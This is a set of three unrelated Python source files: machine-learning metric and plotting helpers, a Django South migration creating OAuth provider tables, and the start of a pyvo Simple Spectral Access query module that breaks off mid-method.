    binary_classification_results["fall_out"] = fall_out
    binary_classification_results["specificity"] = specificity
    if (true_positive + false_positive) > 0:
        precision = true_positive / (true_positive + false_positive)
        false_discovery_rate = false_positive / (true_positive + false_positive)
    else:
        precision = None
        false_discovery_rate = None
    binary_classification_results["precision"] = precision
    binary_classification_results["false_discovery_rate"] = false_discovery_rate
    if (false_negative + true_negative) > 0:
        false_omission_rate = false_negative / (false_negative + true_negative)
        negative_predictive_value = true_negative / (false_negative + true_negative)
    else:
        false_omission_rate = None
        negative_predictive_value = None
    binary_classification_results["false_omission_rate"] = false_omission_rate
    binary_classification_results["negative_predictive_value"] = negative_predictive_value
    accuracy = (true_positive + true_negative) / total_population
    binary_classification_results["accuracy"] = accuracy
    prevalence = (true_positive + false_negative) / total_population
    binary_classification_results["prevalence"] = prevalence
    # Truthiness deliberately treats both None and 0.0 as "ratio undefined"
    # (avoids division by a zero fall_out / specificity).
    if fall_out:
        positive_likelihood_ratio = recall / fall_out
    else:
        positive_likelihood_ratio = None
    binary_classification_results["positive_likelihood_ratio"] = positive_likelihood_ratio
    if specificity:
        negative_likelihood_ratio = miss_rate / specificity
    else:
        negative_likelihood_ratio = None
    binary_classification_results["negative_likelihood_ratio"] = negative_likelihood_ratio
    if negative_likelihood_ratio:
        diagnostic_odds_ratio = positive_likelihood_ratio / negative_likelihood_ratio
    else:
        diagnostic_odds_ratio = None
    binary_classification_results["diagnostic_odds_ratio"] = diagnostic_odds_ratio
    # Idiom fix: combine the boolean tests with `and`, not bitwise `&`.
    if (precision is not None) and (recall is not None):
        if (precision + recall) > 0:
            f1_score = 2 * precision * recall / (precision + recall)
        else:
            f1_score = None
    else:
        f1_score = None
    binary_classification_results["f1_score"] = f1_score
    # NOTE(review): this AUC is computed on hard labels (y_pred), not on
    # y_proba as in the other helpers -- confirm this is intentional.
    logit_roc_auc = metrics.roc_auc_score(dataset["y_true"], dataset["y_pred"])
    binary_classification_results["logit_roc_auc"] = logit_roc_auc
    # Transform to table (to be saved)
    binary_classification_results_table = pd.DataFrame.from_dict(
        binary_classification_results, orient="index", columns=["value"]
    )
    binary_classification_results_table.to_csv(
        f"{save_folder}/{model_name}_binary_classification_results_table.csv"
    )
    with open(
        f"{save_folder}/{model_name}_binary_classification_results_dict.pkl", "wb"
    ) as file:
        dill.dump(binary_classification_results, file)
    return binary_classification_results
def get_regression_results(dataset, model_name="model", save_folder="data"):
    """Score the predicted probabilities ("y_proba") against "y_true" with
    regression-style and probabilistic metrics.

    Returns the metric dict and, as a side effect, writes
    ``{save_folder}/{model_name}_regression_results_table.csv`` and
    ``..._regression_results_dict.pkl``.
    """
    regression_results = dict()
    explained_variance_score = metrics.explained_variance_score(
        y_true=dataset["y_true"], y_pred=dataset["y_proba"]
    )
    regression_results["explained_variance_score"] = explained_variance_score
    max_error = metrics.max_error(y_true=dataset["y_true"], y_pred=dataset["y_proba"])
    regression_results["max_error"] = max_error
    mean_absolute_error = metrics.mean_absolute_error(
        y_true=dataset["y_true"], y_pred=dataset["y_proba"]
    )
    regression_results["mean_absolute_error"] = mean_absolute_error
    root_mean_squared_error = metrics.mean_squared_error(
        y_true=dataset["y_true"], y_pred=dataset["y_proba"], squared=False
    )
    regression_results["root_mean_squared_error"] = root_mean_squared_error
    r2_score = metrics.r2_score(y_true=dataset["y_true"], y_pred=dataset["y_proba"])
    regression_results["r2_score"] = r2_score
    normalised_log_loss = metrics.log_loss(dataset["y_true"], dataset["y_proba"])
    regression_results["normalised_log_loss"] = normalised_log_loss
    # Normalize log loss by the entropy of the class balance p.
    # NOTE(review): np.log(p) diverges when p is 0 or 1 (single-class data).
    p = sum(dataset["y_true"]) / len(dataset)
    average_log_loss = - (p * np.log(p) + (1-p) * np.log(1-p))
    normalised_cross_entropy = normalised_log_loss / average_log_loss
    regression_results["normalised_cross_entropy"] = normalised_cross_entropy
    brier_score = metrics.brier_score_loss(dataset["y_true"], dataset["y_proba"])
    regression_results["brier_score"] = brier_score
    # Transform to table (to be saved)
    regression_results_table = pd.DataFrame.from_dict(
        regression_results, orient="index", columns=["value"]
    )
    regression_results_table.to_csv(
        f"{save_folder}/{model_name}_regression_results_table.csv"
    )
    with open(
        f"{save_folder}/{model_name}_regression_results_dict.pkl", "wb"
    ) as file:
        dill.dump(regression_results, file)
    return regression_results
def add_precision_recall_curve(fig, dataset, model_name="model"):
    """Append a precision-recall trace for *dataset* to *fig* and return it."""
    precision, recall, _ = metrics.precision_recall_curve(
        dataset["y_true"], dataset["y_proba"]
    )
    pr_trace = go.Scatter(x=recall, y=precision, mode="lines", name=model_name)
    fig.add_trace(pr_trace)
    return fig
def plot_precision_recall_curve(dataset, binary_classification_results, model_name="model",
                                show_plot=True, save_plot=True, save_folder="data"):
    """Plot the precision-recall curve with a random-precision baseline.

    Saves to ``{save_folder}/{model_name}_PrecisionRecall.html`` when
    *save_plot* is True.
    """
    # Create traces
    fig = go.Figure()
    # Bug fix: forward the caller's model_name; the trace legend previously
    # always read "model" regardless of the argument (which was only used
    # for the output filename).
    fig = add_precision_recall_curve(fig, dataset, model_name=model_name)
    fig.add_trace(
        go.Scatter(
            x=[0, 1],
            y=[
                binary_classification_results["random_precision"],
                binary_classification_results["random_precision"],
            ],
            mode="lines",
            name="Random precision",
            line=dict(color="black", dash="dash"),
        )
    )
    fig = add_square(fig, x0=0, x1=1, y0=0, y1=1)
    fig.update_layout(
        title="Precision-Recall curve",
        legend={"itemsizing": "constant"},
    )
    fig.update_xaxes(title_text="Recall", range=[-0.05, 1.05])
    fig.update_yaxes(title_text="Precision", range=[-0.05, 1.05])
    if show_plot:
        fig.show()
    if save_plot:
        fig.write_html(f"{save_folder}/{model_name}_PrecisionRecall.html")
def add_roc_auc_curve(fig, dataset, model_name="model"):
    """Append a ROC trace (FPR vs TPR) for *dataset* to *fig* and return it."""
    fpr, tpr, _ = metrics.roc_curve(dataset["y_true"], dataset["y_proba"])
    roc_trace = go.Scatter(x=fpr, y=tpr, mode="lines", name=model_name)
    fig.add_trace(roc_trace)
    return fig
def plot_roc_auc_curve(dataset, model_name="model", show_plot=True, save_plot=True, save_folder="data"):
    """Plot the ROC curve with a diagonal random-classifier baseline.

    Saves to ``{save_folder}/{model_name}_ROC.html`` when *save_plot* is True.
    """
    # Create traces
    fig = go.Figure()
    # Bug fix: forward the caller's model_name; the trace legend previously
    # always read "model" regardless of the argument (which was only used
    # for the output filename).
    fig = add_roc_auc_curve(fig, dataset, model_name=model_name)
    fig.add_trace(
        go.Scatter(
            x=[0, 1],
            y=[0, 1],
            mode="lines",
            name="random",
            line=dict(color="black", dash="dash"),
        )
    )
    fig = add_square(fig, x0=0, x1=1, y0=0, y1=1)
    fig.update_layout(
        title="Receiver operating characteristic (ROC) curve",
        legend={"itemsizing": "constant"},
    )
    fig.update_xaxes(title_text="False Positive Rate", range=[-0.05, 1.05])
    fig.update_yaxes(title_text="True Positive Rate", range=[-0.05, 1.05])
    if show_plot:
        fig.show()
    if save_plot:
        fig.write_html(f"{save_folder}/{model_name}_ROC.html")
def add_square(fig, x0, x1, y0, y1):
    """Draw the four dashed edges of the axis-aligned rectangle
    (x0, y0)-(x1, y1) on *fig* and return it.

    Edges are added bottom, top, left, right -- the same trace order as the
    original four explicit add_trace calls.
    """
    edges = [
        ([x0, x1], [y0, y0]),   # bottom
        ([x0, x1], [y1, y1]),   # top
        ([x0, x0], [y0, y1]),   # left
        ([x1, x1], [y0, y1]),   # right
    ]
    for xs, ys in edges:
        fig.add_trace(
            go.Scatter(
                x=xs,
                y=ys,
                mode="lines",
                showlegend=False,
                line=dict(color="black", dash="dash", width=1),
            )
        )
    return fig
def plot_predictions(dataset, model_name="model", show_plot=True, save_plot=True, save_folder="data"):
    """Plot predicted probabilities (sorted ascending) against true labels.

    Correct predictions are drawn green, incorrect ones red; dashed guides
    mark the 0.5 threshold and the approximate negative/positive boundary.
    Saves to ``{save_folder}/{model_name}_predictions.html`` when *save_plot*
    is True.
    """
    dataset_subset = dataset[["y_true", "y_pred", "y_proba"]].copy()
    dataset_subset.sort_values("y_proba", inplace=True)
    # Color-code per-row correctness for the scatter markers.
    dataset_subset["correct"] = np.where(
        dataset_subset["y_true"] == dataset_subset["y_pred"], "green", "red"
    )
    # Number of true negatives in the sorted order; used to place the
    # diagonal negative/positive divider (assumes 0/1 labels).
    nb_false = len(dataset_subset) - sum(dataset_subset["y_true"])
    fig = go.Figure()
    fig.add_trace(
        go.Scatter(
            x=list(range(len(dataset_subset))),
            y=dataset_subset['y_true'],
            marker=dict(color=dataset_subset["correct"]),
            mode="markers",
            name="True values",
        )
    )
    fig.add_trace(
        go.Scatter(
            x=list(range(len(dataset_subset))),
            y=dataset_subset['y_proba'],
            marker=dict(color='grey'),
            mode="lines+markers",
            name="Predictions",
        )
    )
    # Slanted divider around the index where negatives give way to positives.
    fig.add_trace(
        go.Scatter(
            x=[nb_false - 0.05 * len(dataset_subset), nb_false + 0.05 * len(dataset_subset)],
            y=[0, 1],
            mode="lines",
            name="limit neg/pos",
            line=dict(color="black", dash="dash", width=1),
        )
    )
    # Horizontal 0.5 decision-threshold guide.
    fig.add_trace(
        go.Scatter(
            x=[0, len(dataset_subset)],
            y=[0.5, 0.5],
            mode="lines",
            showlegend=False,
            line=dict(color="black", dash="dash", width=1),
        )
    )
    fig.update_layout(
        title="Predictions and true values",
        xaxis_title="Datapoints",
        yaxis_title="True values and predictions",
    )
    if show_plot:
        fig.show()
    if save_plot:
        fig.write_html(f"{save_folder}/{model_name}_predictions.html")
|
<reponame>philipforget/django-oauth-plus<gh_stars>0
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    # Initial South schema migration for the oauth_provider app: creates
    # the Nonce, Scope, Consumer and Token tables.

    def forwards(self, orm):
        """Apply the migration: create the four oauth_provider tables."""
        # Adding model 'Nonce'
        db.create_table(u'oauth_provider_nonce', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('token_key', self.gf('django.db.models.fields.CharField')(max_length=32)),
            ('consumer_key', self.gf('django.db.models.fields.CharField')(max_length=256)),
            ('key', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('timestamp', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
        ))
        db.send_create_signal(u'oauth_provider', ['Nonce'])

        # Adding model 'Scope'
        db.create_table(u'oauth_provider_scope', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('url', self.gf('django.db.models.fields.TextField')(max_length=2083)),
            ('is_readonly', self.gf('django.db.models.fields.BooleanField')(default=True)),
        ))
        db.send_create_signal(u'oauth_provider', ['Scope'])

        # Adding model 'Consumer'
        db.create_table(u'oauth_provider_consumer', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('description', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('key', self.gf('django.db.models.fields.CharField')(max_length=256)),
            ('secret', self.gf('django.db.models.fields.CharField')(max_length=16, blank=True)),
            ('status', self.gf('django.db.models.fields.SmallIntegerField')(default=1)),
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
            ('xauth_allowed', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ))
        db.send_create_signal(u'oauth_provider', ['Consumer'])

        # Adding model 'Token'
        db.create_table(u'oauth_provider_token', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('key', self.gf('django.db.models.fields.CharField')(max_length=32, null=True, blank=True)),
            ('secret', self.gf('django.db.models.fields.CharField')(max_length=16, null=True, blank=True)),
            ('token_type', self.gf('django.db.models.fields.SmallIntegerField')()),
            # NOTE(review): timestamp default is a value frozen by South at
            # generation time; harmless for the schema but new rows default
            # to this fixed epoch second.
            ('timestamp', self.gf('django.db.models.fields.IntegerField')(default=1382642717L)),
            ('is_approved', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='oauth_tokens', null=True, to=orm['auth.User'])),
            ('consumer', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['oauth_provider.Consumer'])),
            ('scope', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['oauth_provider.Scope'], null=True, blank=True)),
            ('verifier', self.gf('django.db.models.fields.CharField')(max_length=10)),
            ('callback', self.gf('django.db.models.fields.CharField')(max_length=2083, null=True, blank=True)),
            ('callback_confirmed', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ))
        db.send_create_signal(u'oauth_provider', ['Token'])

    def backwards(self, orm):
        """Revert the migration: drop the four oauth_provider tables."""
        # Deleting model 'Nonce'
        db.delete_table(u'oauth_provider_nonce')

        # Deleting model 'Scope'
        db.delete_table(u'oauth_provider_scope')

        # Deleting model 'Consumer'
        db.delete_table(u'oauth_provider_consumer')

        # Deleting model 'Token'
        db.delete_table(u'oauth_provider_token')

    # Frozen ORM definitions that South uses to build the `orm` argument
    # passed to forwards()/backwards() above.
    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'oauth_provider.consumer': {
            'Meta': {'object_name': 'Consumer'},
            'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'key': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'secret': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
            'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
            'xauth_allowed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
        },
        u'oauth_provider.nonce': {
            'Meta': {'object_name': 'Nonce'},
            'consumer_key': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'key': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'timestamp': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'token_key': ('django.db.models.fields.CharField', [], {'max_length': '32'})
        },
        u'oauth_provider.scope': {
            'Meta': {'object_name': 'Scope'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_readonly': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'url': ('django.db.models.fields.TextField', [], {'max_length': '2083'})
        },
        u'oauth_provider.token': {
            'Meta': {'object_name': 'Token'},
            'callback': ('django.db.models.fields.CharField', [], {'max_length': '2083', 'null': 'True', 'blank': 'True'}),
            'callback_confirmed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'consumer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['oauth_provider.Consumer']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_approved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
            'scope': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['oauth_provider.Scope']", 'null': 'True', 'blank': 'True'}),
            'secret': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
            'timestamp': ('django.db.models.fields.IntegerField', [], {'default': '1382642717L'}),
            'token_type': ('django.db.models.fields.SmallIntegerField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'oauth_tokens'", 'null': 'True', 'to': u"orm['auth.User']"}),
            'verifier': ('django.db.models.fields.CharField', [], {'max_length': '10'})
        }
    }
    complete_apps = ['oauth_provider']
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
A module for searching for spectra in a remote archive.
A Simple Spectral Access (SSA) service allows a client to search for
spectra in an archive whose field of view overlaps with a given cone
on the sky. The service responds to a search query with a table in
which each row represents an image that is available for download.
The columns provide metadata describing each image and one column in
particular provides the image's download URL (also called the *access
reference*, or *acref*). Some SSA services can create spectra
on-the-fly from underlying data (e.g. image cubes); in this case, the
query result is a table of images whose aperture matches the
requested cone and which will be created when accessed via the
download URL.
This module provides an interface for accessing an SSA service. It is
implemented as a specialization of the DAL Query interface.
The ``search()`` function supports the simplest and most common types
of queries, returning an SSAResults instance as its results which
represents the matching images from the archive. The SSAResults
supports access to and iterations over the individual records; these
are provided as SSARecord instances, which give easy access to key
metadata in the response, such as the position of the spectrum's
aperture, the spectrum format, its frequency range, and its download
URL.
For more complex queries, the SSAQuery class can be helpful which
allows one to build up, tweak, and reuse a query. The SSAService
class can represent a specific service available at a URL endpoint.
"""
from __future__ import print_function, division
import numbers
import re
import sys
from . import query
__all__ = [ "search", "SSAService", "SSAQuery", "SSAResults", "SSARecord" ]
def search(url, pos, size, format='all', **keywords):
    """
    submit a simple SSA query that requests spectra overlapping a
    given cone on the sky

    Parameters
    ----------
    url : str
        the base URL for the SSA service
    pos : 2-element sequence of floats
        a 2-element sequence giving the ICRS RA and DEC in decimal degrees
    size : float
        a floating point number giving the diameter of the circular region
        in decimal degrees around pos in which to search for spectra.
    format : str
        the spectral format(s) of interest. "all" (default)
        indicates all available formats; "graphic" indicates
        graphical images (e.g. jpeg, png, gif; not FITS);
        "metadata" indicates that no images should be
        returned--only an empty table with complete metadata.
    **keywords:
        additional parameters can be given via arbitrary
        keyword arguments. These can be either standard
        parameters (with names drawn from the
        ``SSAQuery.std_parameters`` list) or parameters
        custom to the service. Where there is overlap
        with the parameters set by the other arguments to
        this function, these keywords will override.

    Returns
    -------
    SSAResults
        a container holding a table of matching spectrum records

    Raises
    ------
    DALServiceError
        for errors connecting to or communicating with the service
    DALQueryError
        if the service responds with an error, including a query syntax error.

    See Also
    --------
    SSAResults
    pyvo.dal.query.DALServiceError
    pyvo.dal.query.DALQueryError
    """
    # Delegate to a throw-away service instance bound to the given URL.
    service = SSAService(url)
    return service.search(pos, size, format, **keywords)
class SSAService(query.DALService):
    """
    a representation of an SSA service
    """

    def __init__(self, baseurl, resmeta=None, version="1.0"):
        """
        instantiate an SSA service

        Parameters
        ----------
        baseurl : str
            the base URL for submitting search queries to the service.
        resmeta : dict
            an optional dictionary of properties about the service
        """
        # "ssa" identifies the DAL protocol to the generic base class.
        super(SSAService, self).__init__(baseurl, "ssa", version, resmeta)

    def search(self, pos, size, format='all', **keywords):
        """
        submit a simple SSA query to this service with the given constraints.

        This method is provided for a simple but typical SSA queries. For
        more complex queries, one should create an SSAQuery object via
        create_query()

        Parameters
        ----------
        pos : 2-element tuple of floats
            a 2-element tuple giving the ICRS RA and Dec of the
            center of the search region in decimal degrees
        size : float
            a floating point number giving the diameter of the circular region
            in decimal degrees around pos in which to search for spectra.
        format : str
            the spectral format(s) of interest. "all" (default)
            indicates all available formats; "graphic" indicates
            graphical spectra (e.g. jpeg, png, gif; not FITS);
            "metadata" indicates that no spectra should be
            returned--only an empty table with complete metadata.
        **keywords :
            additional parameters can be given via arbitrary
            keyword arguments. These can be either standard
            parameters (with names drawn from the
            ``SSAQuery.std_parameters`` list) or parameters
            custom to the service. Where there is overlap
            with the parameters set by the other arguments to
            this function, these keywords will override.

        Returns
        -------
        SSAResults
            a container holding a table of matching catalog records

        Raises
        ------
        DALServiceError
            for errors connecting to or communicating with the service
        DALQueryError
            if the service responds with an error, including a query syntax error

        See Also
        --------
        SSAResults
        pyvo.dal.query.DALServiceError
        pyvo.dal.query.DALQueryError
        """
        q = self.create_query(pos, size, format, **keywords)
        return q.execute()

    def create_query(self, pos=None, size=None, format=None, **keywords):
        """
        create a query object that constraints can be added to and then
        executed. The input arguments will initialize the query with the
        given values.

        Parameters
        ----------
        pos : 2-element tuple of floats
            a 2-element tuple giving the ICRS RA and Dec of the
            center of the search region in decimal degrees
        size : float
            a floating point number giving the diameter of the circular region
            in decimal degrees around pos in which to search for spectra.
        format : str
            the image format(s) of interest. "all" indicates
            all available formats; "graphic" indicates
            graphical images (e.g. jpeg, png, gif; not FITS);
            "metadata" indicates that no images should be
            returned--only an empty table with complete metadata.
        **keywords :
            additional parameters can be given via arbitrary
            keyword arguments. These can be either standard
            parameters (with names drawn from the
            ``SSAQuery.std_parameters`` list) or parameters
            custom to the service. Where there is overlap
            with the parameters set by the other arguments to
            this function, these keywords will override.

        Returns
        -------
        SSAQuery
            the query instance

        See Also
        --------
        SSAQuery
        """
        q = SSAQuery(self.baseurl, self.version)
        # Only set constraints the caller actually supplied.
        if pos is not None: q.pos = pos
        if size is not None: q.size = size
        if format: q.format = format
        # Arbitrary keywords are applied last so they can override the above.
        for key in keywords.keys():
            q.setparam(key, keywords[key])
        return q
class SSAQuery(query.DALQuery):
    """
    a class for preparing a query to an SSA service. Query constraints
    are added via its service type-specific properties and methods. Once
    all the constraints are set, one of the various execute() functions
    can be called to submit the query and return the results.

    The base URL for the query, which controls where the query will be sent
    when one of the execute functions is called, is typically set at
    construction time; however, it can be updated later via the
    :py:attr:`~pyvo.dal.query.DALQuery.baseurl` to send a configured
    query to another service.

    In addition to the attributes described below, search parameters can be
    set generically by name via the
    :py:attr:`~pyvo.dal.query.DALQuery.setparam`()
    method. The class attribute, ``std_parameters``, list the parameters
    defined by the SSA standard.

    The typical function for submitting the query is ``execute()``; however,
    alternate execute functions provide the response in different forms,
    allowing the caller to take greater control of the result processing.
    """

    # Parameter names defined by the SSA standard (used by setparam callers
    # to distinguish standard from service-custom parameters).
    std_parameters = [ "REQUEST", "VERSION", "POS", "SIZE", "BAND", "TIME",
                       "FORMAT", "APERTURE", "SPECRP", "SPATRES", "TIMERES",
                       "SNR", "REDSHIFT", "VARAMPL", "TARGETNAME",
                       "TARGETCLASS", "FLUXCALIB", "WAVECALIB", "PUBID",
                       "CREATORID", "COLLECTION", "TOP", "MAXREC", "MTIME",
                       "COMPRESS", "RUNID" ]

    # Accepted TIME formats: YYYY, YYYY-MM, YYYY-MM-DD, YYYY-MM-DDTHH:MM:SS.
    # Compiled once at class level; anchored at the end with $ (re.match
    # already anchors the start).
    _time_format = re.compile(r"\d{4}$|\d{4}-\d{2}$|\d{4}-\d{2}-\d{2}$|"
                              r"\d{4}-\d{2}-\d{2}T\d{2}\:\d{2}\:\d{2}$")

    def __init__(self, baseurl, version="1.0", request="queryData"):
        """
        initialize the query object with a baseurl and request type

        Parameters
        ----------
        baseurl : str
            the base URL for submitting queries to the service
        version : str
            the SSA protocol version to assume
        request : str
            the value for the standard REQUEST parameter
        """
        super(SSAQuery, self).__init__(baseurl, "ssa", version)
        self.setparam("REQUEST", request)

    @property
    def pos(self):
        """
        the position (POS) constraint as a 2-element tuple denoting RA and
        declination in decimal degrees. This defaults to None.
        """
        return self.getparam("POS")

    @pos.setter
    def pos(self, pair):
        # validate: must be a 2-element sequence of numbers
        if (isinstance(pair, list)):
            pair = tuple(pair)
        if (isinstance(pair, tuple)):
            if len(pair) != 2:
                raise ValueError("Wrong number of elements in pos list: " +
                                 str(pair))
            if (not isinstance(pair[0], numbers.Number) or
                not isinstance(pair[1], numbers.Number)):
                raise ValueError("Wrong type of elements in pos list: " +
                                 str(pair))
        else:
            raise ValueError("pos not a 2-element sequence")

        if pair[1] > 90.0 or pair[1] < -90.0:
            raise ValueError("pos declination out-of-range: " + str(pair[1]))

        # normalize the RA into [0, 360)
        while pair[0] < 0:
            pair = (pair[0]+360.0, pair[1])
        while pair[0] >= 360.0:
            pair = (pair[0]-360.0, pair[1])

        self.setparam("POS", pair)

    @pos.deleter
    def pos(self):
        self.unsetparam('POS')

    @property
    def ra(self):
        """
        the right ascension part of the position constraint (default: None).
        If this is set but dec has not been set yet, dec will be set to 0.0.
        """
        if not self.pos: return None
        return self.pos[0]

    @ra.setter
    def ra(self, val):
        if not self.pos: self.pos = (0.0, 0.0)
        self.pos = (val, self.pos[1])

    @property
    def dec(self):
        """
        the declination part of the position constraint (default: None).
        If this is set but ra has not been set yet, ra will be set to 0.0.
        """
        if not self.pos: return None
        return self.pos[1]

    @dec.setter
    def dec(self, val):
        if not self.pos: self.pos = (0.0, 0.0)
        self.pos = (self.pos[0], val)

    @property
    def size(self):
        """
        the diameter of the search region specified in decimal degrees
        """
        return self.getparam("SIZE")

    @size.setter
    def size(self, val):
        if val is not None:
            if not isinstance(val, numbers.Number):
                raise ValueError("size constraint is not a number")
            if val <= 0.0 or val > 180.0:
                raise ValueError("size constraint out-of-range: " + str(val))
        self.setparam("SIZE", val)

    @size.deleter
    def size(self):
        self.unsetparam("SIZE")

    @property
    def band(self):
        """
        the spectral bandpass given in a range-list format in units of
        meters

        Examples of proper format include:

        ========================= =====================================
        0.20/0.21.5               a wavelength range that includes 21cm
        2.7E-7/0.13               a bandpass from optical to radio
        ========================= =====================================
        """
        return self.getparam("BAND")

    @band.setter
    def band(self, val):
        self.setparam("BAND", val)

    @band.deleter
    def band(self):
        self.unsetparam("BAND")

    @property
    def time(self):
        """
        the time coverage given in a range-list format using a restricted
        subset of ISO 8601.

        Examples of proper format include:

        ========================= =====================================
        2003/2009                 covers years 2003-09, inclusive
        2003-02/2003-04           covers Feb. through April in 2003
        2003-05-02/2010-09-21     covers a range of days
        2001-05-02T12:21:30/2010  provides second resolution
        ========================= =====================================
        """
        return self.getparam("TIME")

    @time.setter
    def time(self, val):
        # A "/" separates the start and stop of a range; each piece must
        # match one of the accepted ISO 8601 subsets.
        # BUGFIX: the original looped over "_" while testing the undefined
        # name "date", and the misplaced parenthesis called re.match with
        # only the pattern, so any assignment raised instead of validating.
        if "/" in val:
            dates = val.split("/")
        else:
            dates = [val]

        for date in dates:
            if not self._time_format.match(date):
                raise ValueError("time format not valid: " + val)

        self.setparam("TIME", val)

    @time.deleter
    def time(self):
        self.unsetparam("TIME")

    @property
    def format(self):
        """
        the desired format of the images to be returned. This will be in the
        form of a comma-separated list of MIME-types or one of the following
        special values.

        ========= =======================================================
        **value** **meaning**
        all       all formats available
        compliant any SSA data model compliant format
        native    the native project specific format for the spectrum
        graphic   any of the graphics formats: JPEG, PNG, GIF
        votable   the SSA VOTable format
        fits      the SSA-compliant FITS format
        xml       the SSA native XML serialization
        metadata  no images requested; only an empty table with fields
                  properly specified
        ========= =======================================================
        """
        return self.getparam("FORMAT")

    @format.setter
    def format(self, val):
        # each comma-separated entry must be a MIME type or a special value
        formats = val.split(",")
        for f in formats:
            f = f.lower()
            if not query.is_mime_type(f) and \
               f not in ["all", "compliant", "native", "graphic", "votable",
                         "fits", "xml", "metadata"]:
                raise ValueError("format type not valid: " + f)
        self.setparam("FORMAT", val)

    @format.deleter
    def format(self):
        self.unsetparam("FORMAT")

    def execute(self):
        """
        submit the query and return the results as a Results subclass instance.
        This implementation returns an SSAResults instance

        Returns
        -------
        SSAResults
            a container holding a table of matching catalog records

        Raises
        ------
        DALServiceError
            for errors connecting to or communicating with the service
        DALQueryError
            if the service responds with an error, including a query syntax error

        See Also
        --------
        SSAResults
        pyvo.dal.query.DALServiceError
        pyvo.dal.query.DALQueryError
        """
